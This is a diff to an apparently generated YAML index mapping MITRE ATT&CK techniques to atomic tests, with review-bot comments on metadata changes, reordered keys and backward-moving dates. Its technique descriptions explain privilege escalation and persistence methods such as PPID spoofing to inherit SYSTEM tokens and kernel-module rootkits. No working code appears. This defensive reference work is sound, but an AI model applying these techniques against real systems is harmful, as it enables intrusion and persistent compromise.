+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
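Review bot: the new `Lacework AI Resource Hijacking 2024` entry lists the title before the date and the organisation after it (`Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs.`), whereas every neighbouring entry puts the author or organisation first (`Google. (n.d.). gcloud compute os-login ssh-keys add.`). If the text is copied verbatim from upstream STIX this is harmless; if it is hand-edited, `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts.` matches the existing style. The `Permiso Scattered Spider 2023` entry's `source_name` matches the key used in the description.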
@@ -20025,10 +20343,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -20045,9 +20373,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: AWS - Create Access Key and Secret Key
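Review bot: of the three keys removed at the end of the T1098.001 object, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are re-inserted earlier in the same object (after `kill_chain_phases` and after `x_mitre_is_subtechnique` respectively), so they only move; `spec_version: '2.1'` is the one that actually disappears. The `atomic_tests` list that follows, starting with `AWS - Create Access Key and Secret Key`, is untouched in this hunk.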
@@ -20145,7 +20470,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -20234,7 +20558,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20292,7 +20615,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
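Review bot: `modified` for T1134.004 moves backwards, from '2022-05-24T14:00:00.188Z' to '2022-05-03T02:15:42.360Z', and the same backward shift appears later in this diff for VDSO Hijacking, Emond, T1574.010, T1547.006 and KernelCallbackTable. Several of the old values share the round `14:00:00.188Z` timestamp, which suggests the previous index was generated from a differently normalised source rather than from a later ATT&CK release; stating in the PR description which STIX release this regeneration is based on would make the date regressions explainable.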
@@ -20317,12 +20640,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20348,7 +20670,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20362,7 +20683,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20389,8 +20709,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -20401,7 +20721,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
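Review bot: `x_mitre_attack_spec_version` for T1546.001 goes from 2.1.0 (removed in `@@ -20348,7 +20670,6 @@`) to 3.2.0 here, and `x_mitre_modified_by_ref` likewise moves from its earlier position, while `x_mitre_version` stays '1.0' and the only content change is the refreshed `Microsoft File Handlers` reference URL and retrieval date in `@@ -20389,8 +20709,8 @@`. That is consistent with a reference-only upstream update, so no atomic test mapping should change for this technique.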
@@ -20472,7 +20793,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20499,7 +20820,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20539,7 +20859,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20559,12 +20879,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20618,11 +20937,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20709,9 +21027,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20724,12 +21042,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20765,16 +21082,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
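Review bot: `Office 365` and `Google Workspace` are removed from the T1098 platform list and `Office Suite` added, alongside the `Azure AD` to `Identity Provider` change already seen for T1098.001, with `x_mitre_version` '2.6' to '2.7'. If any per-platform index files in this repository are derived from `x_mitre_platforms`, they need regenerating in the same change so that tests filed under the old platform names are not orphaned; the atomic test entries below (`AWS - Create a group and add a user to that group`) are themselves unchanged.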
@@ -20815,7 +21131,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: AWS - Create a group and add a user to that group
@@ -20853,138 +21168,137 @@ privilege-escalation:
name: sh
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
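Review bot: the whole description, x_mitre_detection, kill_chain_phases, x_mitre_data_sources and x_mitre_permissions_required of T1547.006 are deleted in this hunk and only `url:`, `object_marking_refs` and a bumped `x_mitre_attack_spec_version: 3.2.0` come back, so confirm the dropped keys are re-emitted earlier in the same object rather than lost (the T1546.004 block later in this patch shows the generator moving keys, not dropping them, so this is probably a reorder, but the hunk alone does not prove it). The new `+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux` line is attached to an external reference whose `source_name` is outside the visible context; check its indentation lands under the `Wikipedia Loadable Kernel Module` entry and not at the object's top level. The removed `modified: '2022-05-11T14:00:00.188Z'` likewise has no `+` replacement in view; a technique without `modified` breaks anything that sorts the index by last change. Since most of this patch is key reordering, consider having the generator emit keys in a fixed order so future regenerations diff only on real content.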
@@ -21021,7 +21335,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
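Review bot: `modified` for T1574.013 moves backwards, from 2022-05-11 to 2022-03-22. The same regression recurs across this patch (T1068, T1134.005, T1547.002, T1037.005, T1055.009 and others), which suggests the regenerated index now reads each object's own STIX `modified` rather than the date of the collection version it was previously taken from. That is fine if intentional, but say so in the PR description, because any consumer diffing this index by `modified` will see dozens of techniques appear to go back in time.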
@@ -21047,12 +21361,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
